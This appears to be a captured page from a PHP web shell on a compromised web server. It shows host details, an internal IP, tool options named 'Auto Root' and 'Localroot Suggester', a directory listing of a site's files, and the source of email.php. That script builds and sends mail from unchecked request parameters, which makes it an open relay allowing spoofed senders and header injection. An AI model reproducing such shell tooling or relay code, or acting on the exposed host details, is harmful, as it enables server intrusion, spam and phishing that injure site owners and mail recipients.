Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
callforentries2020 /
data /
Delete
Unzip
Name
Size
Permission
Date
Action
languages
[ DIR ]
drwxr-sr-x
2020-02-10 07:42
bookinfo-contentmenu.xml
1.34
KB
-rw-r--r--
2020-02-10 07:42
bookinfo.xml
4.37
KB
-rw-r--r--
2020-02-10 07:42
bookmarks.xml
78
B
-rw-r--r--
2020-02-10 07:42
buttons.xml
74
B
-rw-r--r--
2020-02-10 07:42
contents.xml
816
B
-rw-r--r--
2020-02-10 07:42
copyright.xml
27
B
-rw-r--r--
2020-02-10 07:42
copyright.xmlbak
198
B
-rw-r--r--
2020-02-10 07:42
copyright_empty.xml
27
B
-rw-r--r--
2020-02-10 07:42
email.php
1.67
KB
-rw-r--r--
2020-02-10 07:42
forms.xml
21
B
-rw-r--r--
2020-02-10 07:42
hotlinks.xml
76
B
-rw-r--r--
2020-02-10 07:42
issues.xml
72
B
-rw-r--r--
2020-02-10 07:42
pages.xml
2.56
KB
-rw-r--r--
2020-02-10 07:42
rss.xml
12
B
-rw-r--r--
2020-02-10 07:42
search.xml
77.55
KB
-rw-r--r--
2020-02-10 07:42
share.xml
763
B
-rw-r--r--
2020-02-10 07:42
slideshow.xml
80
B
-rw-r--r--
2020-02-10 07:42
sounds.xml
272
B
-rw-r--r--
2020-02-10 07:42
videos.xml
72
B
-rw-r--r--
2020-02-10 07:42
Save
Rename
<?php $mail_To = $_REQUEST['tomail']; $mail_From = $_REQUEST['frommail']; $mail_Subject = stripslashes($_REQUEST['subject']); // 需要转义单引号 $mail_Body = stripslashes($_REQUEST['message']); // 需要转义单引号 // 对邮件地址进行UTF-8编码转化 function format_mail_address($address){ if(preg_match("|<([^<]+)>|", $address, $matches)){ $name = mb_substr($address, 0, strpos($address, '<')); $name = trim($name); $mail = $matches[1]; $address = "=?UTF-8?B?".base64_encode($name)."?= " . "<$mail>"; } return $address; } // 发送html格式的邮件 function html_mail($from, $to, $subject, $body){ if(preg_match("|<([^<]+)>|", $from, $matches)){ $from_name = mb_substr($from, 0, strpos($from, '<')); $from_mail = $matches[1]; $from = "=?UTF-8?B?".base64_encode($from_name)."?= " . "<$from_mail>"; }else{ $from_mail = $from; } $headers[] = "From: $from"; $headers[] = "X-Mailer: PHP"; $headers[] = "MIME-Version: 1.0"; $headers[] = "Content-type: text/html; charset=utf8"; $headers[] = "Reply-To: $from_mail"; $subject = "=?UTF-8?B?".base64_encode($subject)."?="; if(is_array($to)){ foreach($to as $mail) $to_mails[] = format_mail_address($mail); $to = join(", ", $to_mails); } mail($to, $subject, $body, join("\r\n", $headers), "-f $from_mail"); } $headers[] = "From: $mail_From";; $headers[] = "X-Mailer: PHP"; $headers[] = "MIME-Version: 1.0"; $headers[] = "Content-Type: text/html; charset=utf8"; $headers[] = "Reply-To: $mail_From"; mail($mail_To, $mail_Subject, $mail_Body, join("\r\n", $headers)); //html_mail($mail_From,$mail_To,$mail_Subject,$mail_Body); ?>